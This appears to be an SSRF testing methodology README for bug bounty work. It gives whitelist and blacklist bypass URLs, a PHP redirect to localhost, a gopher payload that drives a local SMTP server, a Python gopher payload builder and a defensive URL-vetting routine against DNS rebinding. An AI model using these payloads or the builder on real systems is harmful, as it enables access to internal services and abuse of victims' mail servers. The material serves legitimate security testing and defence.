# SSRF
## SSRF Methodology Flowchart
Since I've seen so many people ask what to do once they get a request back to their collaborator instance, I created this flowchart to present what I usually do to test and escalate SSRFs.

## Disclaimer
I am sure there are a few other ways of bypassing SSRF filters which I did not include; this flowchart shows the ones I personally test against.

## False Positives
DNS-only queries (a lookup of your collaborator domain with no HTTP or TCP connection following it) are rarely exploitable and should never be reported without additional impact: plenty of components that merely touch the value (mail validators, link previewers, logging, anti-spam) resolve a hostname without ever letting you steer a request.

When using your listener as an email domain (`test@burpcollaborator.com`), receiving SMTP + DNS queries is not a sign of SSRF. It's just how SMTP works (the target's mail server looks up your MX record and connects to port 25 to deliver the message) and should never be reported. There have been edge cases where the payload `test@burpcollaborator.com` led to HTTP requests; if that's the case, SSRF might be possible. See [d0nut's Piercing the veal](https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5) story 4.

## Sources
### Whitelist filter bypasses
Some common whitelist filter bypasses I test against. Each one keeps the literal string `target.com` in the URL, so a substring or prefix check passes, while the host that actually gets connected to is attacker-controlled: with `@` the `target.com` part becomes userinfo, with `/` it becomes the path, and as a subdomain prefix it is just a label of `attacker.com`.
```
https://target.com@attacker.com
https://attacker.com/target.com
https://target.com.attacker.com
```
### Blacklist filter bypasses (decimal, hex, octal)
Inspired by [EdOverflow's blogpost on exploiting Ruby's Resolv](https://edoverflow.com/2017/ruby-resolv-bug/). `inet_aton`-style parsers accept all of these as `127.0.0.1`, so a blacklist that only matches the dotted-quad spelling lets them through: `0177` is octal 127, `0x7f` is hex 127, and with fewer than four components the last one fills the remaining bytes.
```
http://0177.1:22/
http://0x7f.1:22/
http://127.000.001:22/
```
See more at [PayloadsAllTheThings SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)

### PHP Redirect
Host this on a server you control and hand its URL to the vulnerable parameter. If the server's HTTP client follows redirects, it ends up requesting whatever you put after `Location:`, which a filter that only checked the original URL never saw. You can also play around with status codes other than 301, such as 302, 303 and 307, since clients differ in which ones they follow and whether they keep the method and body.
```php
<?php
// The URL after "Location:" is the one the vulnerable server will fetch next.
// Change the status code (301 here) to 302, 303 or 307 to test which ones its client follows.
header('Location: http://127.0.0.1/', TRUE, 301);
?>
```
### SMTP Gopher payloads
Inspired by [d0nut's Piercing the veal](https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5). `gopher://` lets you put arbitrary bytes on a TCP socket: the client strips the leading `/` and the dummy item-type character `_`, percent-decodes the rest and writes it verbatim, so the `%0A`-joined lines become an SMTP conversation with the mail server on port 25 of the host itself (`0` is the shortest spelling of `0.0.0.0`, which on Linux connects to the local machine). Some MTAs insist on `%0D%0A` line endings.
```php
<?php
    $commands = array(
        'HELO victim.com',
        'MAIL FROM: <admin@victim.com>',
        'RCPT To: <sxcurity@oou.us>',
        'DATA',
        'Subject: @sxcurity!',
        'Corben was here, woot woot!',
        '.'
    );

    $payload = implode('%0A', $commands);

    header('Location: gopher://0:25/_'.$payload);
?>
```
Payload taken from [PayloadsAllTheThings SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
### Exploiting inconsistencies in URL parsers + DNS rebinding
Orange Tsai's Black Hat presentation explains this perfectly ([PDF slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf) + [YouTube presentation](https://www.youtube.com/watch?v=R9pJ2YCXoJQ&ab_channel=BlackHat)).
I also highly recommend watching LiveOverflow's video ([PHP include and bypass SSRF protection with two DNS A records](https://www.youtube.com/watch?v=PKbxK2JH23Y&ab_channel=LiveOverflow)), which discusses URL parsing inconsistencies while also touching on DNS rebinding. The common thread is that the code validating the URL and the code fetching it parse the URL, or resolve the hostname, independently, so you only need the two to disagree: a second A record or a second lookup is enough.
### More SSRF Resources
[Jdonsec's list of SSRF Resources](https://github.com/jdonsec/AllThingsSSRF)

![SSRF methodology flowchart](https://raw.githubusercontent.com/iustin24/SSRF/c00e09ab2844204dc8019a1375f837e7c973b1aa/iustinSSRFflowchart.png)
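### Added example: vetting a URL against the bypasses above
This is an added example, not code from this repo or from any of the linked write-ups. It shows the defender's side of the whitelist bypasses, the decimal/hex/octal IP spellings and the two-A-record trick from the DNS rebinding section in one routine: the hostname is taken from a real URL parser (so `target.com@attacker.com` is seen as `attacker.com`), IP literals are canonicalised with an `inet_aton`-compatible parser before any policy check, every resolved address must be public, and the checked address is returned for the caller to connect to so the fetch cannot resolve the name a second time. The allowlist `{'target.com'}`, the `FAKE_DNS` table and the function names are assumptions made for the demo.

```python
import string
from ipaddress import ip_address, IPv4Address
from typing import Callable, Iterable, Optional, Set, Tuple
from urllib.parse import urlsplit

_DIGITS = {16: string.hexdigits, 8: string.octdigits, 10: string.digits}


def naive_whitelist(url: str) -> bool:
    """The substring check the whitelist bypasses defeat: all three payloads contain it."""
    return "target.com" in url


def naive_blacklist(url: str) -> bool:
    """The denylist check the decimal/hex/octal spellings defeat: exact string compare."""
    return urlsplit(url).hostname not in {"127.0.0.1", "localhost"}


def parse_legacy_ipv4(host: str) -> Optional[IPv4Address]:
    """Parse an IPv4 literal the way BSD inet_aton does: each component may be
    decimal, 0-prefixed octal or 0x-prefixed hex, and with fewer than four
    components the last one fills the remaining bytes. None if not a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if part[:2].lower() == "0x":
            base, digits = 16, part[2:]
        elif len(part) > 1 and part[0] == "0":
            base, digits = 8, part[1:]
        else:
            base, digits = 10, part
        if not digits or any(c not in _DIGITS[base] for c in digits):
            return None
        values.append(int(digits, base))
    *head, last = values
    if any(v > 0xFF for v in head) or last >= 1 << (8 * (4 - len(head))):
        return None
    number = last
    for i, v in enumerate(head):
        number |= v << (24 - 8 * i)
    return IPv4Address(number)


def vet_url(url: str, resolve: Callable[[str], Iterable[str]],
            allowed_hosts: Optional[Set[str]] = None) -> Tuple[Optional[str], str]:
    """Returns (pinned_ip, reason). pinned_ip is the address to open the socket to
    (send the Host header yourself), or None if the URL is rejected. `resolve` is
    injected so this runs offline; real code does one lookup here and never lets
    the HTTP client resolve the name a second time (that is the rebinding window)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # lowercased; userinfo such as 'target.com@' is stripped
    if not host:
        return None, "no host"
    # Canonicalise any IP literal first so '0177.1' meets the same rule as '127.0.0.1'.
    literal = parse_legacy_ipv4(host)
    if literal is None:
        try:
            literal = ip_address(host)  # IPv6 literals such as '::1'
        except ValueError:
            literal = None
    if allowed_hosts is not None and (literal is not None or host not in allowed_hosts):
        return None, f"host {host!r} not in allowlist"
    addrs = [str(literal)] if literal is not None else [str(a) for a in resolve(host)]
    if not addrs:
        return None, f"{host!r} did not resolve"
    # Every record must be public: with one public and one 127.0.0.1 A record, a
    # check that only looks at the first answer passes and the fetch hits localhost.
    for addr in addrs:
        if not ip_address(addr).is_global:
            return None, f"{host!r} maps to non-public address {addr}"
    return addrs[0], "ok"


# Constructed DNS table for the demo; these are not real records.
FAKE_DNS = {
    "target.com": ["93.184.216.34"],
    "attacker.com": ["104.16.0.1"],
    "target.com.attacker.com": ["104.16.0.1"],
    "rebind.attacker.com": ["104.16.0.1", "127.0.0.1"],
}


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for url in ("https://target.com@attacker.com", "https://attacker.com/target.com",
                "https://target.com.attacker.com", "http://0177.1:22/",
                "http://0x7f.1:22/", "http://127.000.001:22/",
                "http://rebind.attacker.com/", "https://target.com/"):
        print(f"{url:36} naive_wl={naive_whitelist(url)!s:5} "
              f"naive_bl={naive_blacklist(url)!s:5} strict={vet_url(url, fake_resolve, {'target.com'})}")
```

Without `allowed_hosts` the routine is the "any external host, nothing internal" policy most webhook fetchers use, which is exactly where the IP-spelling and rebinding tricks matter; with it, the allowlist comparison is an exact match on the parsed hostname rather than on the raw string.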
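### Added example: building and checking gopher payloads
This is an added example, not code from this repo or from PayloadsAllTheThings. It generalises the SMTP gopher payload above into a builder that percent-encodes arbitrary protocol lines into a `gopher://` URL (with CRLF or the bare LF the PHP snippet uses) and a decoder that shows the exact bytes the target will write to the socket, so a payload can be checked before it goes into a `Location` header. The `SMTP_LINES` conversation and the addresses in it are constructed placeholders, and the function names are assumptions.

```python
from urllib.parse import quote, unquote_to_bytes

# Constructed SMTP conversation for the demo; the addresses are placeholders.
SMTP_LINES = [
    "HELO victim.com",
    "MAIL FROM: <admin@victim.com>",
    "RCPT TO: <you@example.test>",
    "DATA",
    "Subject: ssrf test",
    "sent through gopher",
    ".",
    "QUIT",
]


def build_gopher_url(host: str, port: int, lines, crlf: bool = True) -> str:
    """Pack raw protocol lines into a gopher:// URL. The client strips the '/'
    and the item-type character ('_') and writes the percent-decoded remainder
    to the socket. SMTP formally wants CRLF; the PHP payload above uses bare LF
    (%0A), which most MTAs tolerate, so both are supported."""
    eol = "\r\n" if crlf else "\n"
    raw = eol.join(lines) + eol
    # safe='' encodes '/', '?', '#', '<', '>', '@', spaces and CR/LF, so no byte
    # of the payload can be read as URL structure (curl, for one, turns a literal
    # '?' in a gopher selector into a TAB before sending).
    return f"gopher://{host}:{port}/_{quote(raw, safe='')}"


def gopher_payload_bytes(url: str) -> bytes:
    """Decode a gopher URL back to the bytes the target will send, so a payload
    can be verified before it is used."""
    if not url.startswith("gopher://"):
        raise ValueError("not a gopher URL")
    rest = url[len("gopher://"):]
    slash = rest.find("/")
    selector = rest[slash + 1:] if slash >= 0 else ""
    return unquote_to_bytes(selector[1:])  # drop the item-type character


def smtp_payload_url(host: str = "0", port: int = 25) -> str:
    """The SMTP conversation above as a gopher URL with CRLF line endings; '0'
    is the shortest spelling of 0.0.0.0, which on Linux connects to the local machine."""
    return build_gopher_url(host, port, SMTP_LINES)


if __name__ == "__main__":
    url = smtp_payload_url()
    print(url)
    print(gopher_payload_bytes(url).decode())
```

The same builder works for any line-oriented plaintext service reachable from the vulnerable host (Redis, memcached, FastCGI needs binary framing but the encoding step is identical); the decoder is the quickest way to spot a stray `?`, space or unencoded newline that the fetcher would otherwise mangle.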